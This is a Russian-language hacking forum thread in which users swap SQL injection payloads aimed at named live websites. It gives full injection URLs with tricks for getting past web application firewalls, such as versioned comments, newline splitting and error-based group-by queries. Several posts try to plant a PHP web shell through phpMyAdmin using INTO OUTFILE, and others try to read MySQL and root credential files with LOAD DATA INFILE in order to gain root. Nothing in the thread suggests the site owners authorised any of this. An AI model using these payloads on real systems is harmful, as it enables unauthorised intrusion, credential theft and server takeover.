Ваши вопросы по уязвимостям.

докручивай через post запрос, там error-based.

 

Не получается обойти фильтр на слово information_schema.
/*!information_schema*/ , dgsdginformation_schemasdgsdg, частичное и полное url кодирование не помогают, какие еще варианты есть?

http://www.globekey.com/weblink/index.php?hid=USM5829k'+/*!50000union*/+/*!50000select*/+1,2,3,4,5,6,7,8,9,table_name,11,12,13,14,15,16+--+

сайт банит ip при неудачных попытках

 

Щас выложат и завтра уже залепят новый фильтр. А по сути реально способов обойти mod security и подобные WAF не так уж и много и почти все уже в фильтрах.

 

не получается обойти waf с фильтром на union select, selecr from. какие решениея есть? мб етсь возможность составить запрос, гду from будет впереди select, или как нибудь по-другому??
http://blogger.saibaba.us/cart.php?shopping_cart=yes&add2cart=1029+||@:=10+group+by+left(version(),@:=~@)having+min(0)

 

http://blogger.saibaba.us/cart.php?shopping_cart=yes&add2cart=1029+or+1+group+by+concat((select+table_name+%0A+from+information_schema.tables+limit+1,1),floor(rand(0)*2))having+min(0)
разбиваем запрос переносом строки

 

Code:

http://blogger.saibaba.us/cart.php?shopping_cart=yes&add2cart=1029||@:=10+group+by+left((select%23+faza%0Atable_name+from+information_schema.tables+limit+1,1),@:=~@)having+min(0)

 

Подскажите как можно залить шелл через phpmyadmin. Не root

Есть пути, пробовал через SELECT '<?php system($cmd) ?>' INTO OUTFILE '/путь/shell.php'

#1045 - Access denied for user 'user'@'localhost' (using password: YES)

Версия MySQL-клиента: 5.1.73

Пробовал вывести на страницы код php, но выводит как текст.

Интересуют всевозможные способы.

 

Никак, прав нету

 

без рута не как. так как нету прав на запить. сам когда то мучался пару месяцев. ищи в базе возможно есть база цмс какойто через которую можно залить

 

Вы все неправы, можно залиться
https://rdot.org/forum/showthread.php?t=741

 

в топике нет ни слова про заливку
только чтение

 

А Вы головой подумайте.

 

Спасибо, если я правильно понял, ты ты намекаешь, на то что можно прочитать любые файлы. Если так, то работает, но вряд ли поможет залить шелл. Или же все-таки можно при помощи LOAD DATA INFILE как-то напрямую залить шелл? Я просто не силен в MySQL.

 

Прочитай конфиги мускула и зайди уже из под рута.

 

Прочитал этот файл /etc/mysql/my.cnf
Но пароля там нет.

Пытаюсь этот прочитать
LOAD DATA LOCAL INFILE '/root/.my.cnf' INTO TABLE mytable FIELDS TERMINATED BY '\n'

Выдает ошибку.
#13 - File '/root/.my.cnf' not found (Errcode: 13)



Upd. Еще у меня есть форма входа в ISP Manager. Может от него можно как-то узнать логин и пас?

 

хм.. пробовал

Code:

LOAD DATA LOCAL INFILE '/etc/mysql/my.cnf' INTO TABLE test FIELDS TERMINATED BY '\n'

выдает

Code:

#2000 - open_basedir restriction in effect. Unable to open file

или файл не найден на старых версиях пхпмайадмина

Code:

#2 - File '/etc/mysql/my.cnf' not found (Errcode: 2)
#13 - File '/root/.my.cnf' not found (Errcode: 13)  

и так на больше 10 майадминов без рута

 

Можно тут что нибудь сделать?
фильтрует запятые, скобки

 

Wulnerable это выдал.
Можно здесь что-нибудь сделать?

 

inj в order by — значит только blind или error-based. фильтр на = и (
урленкод и даблурленкод тоже не помог, да и векторов без использования скобок я не видел.

 

Парни кто поможет с моим вопросом? Буду очень благодарен!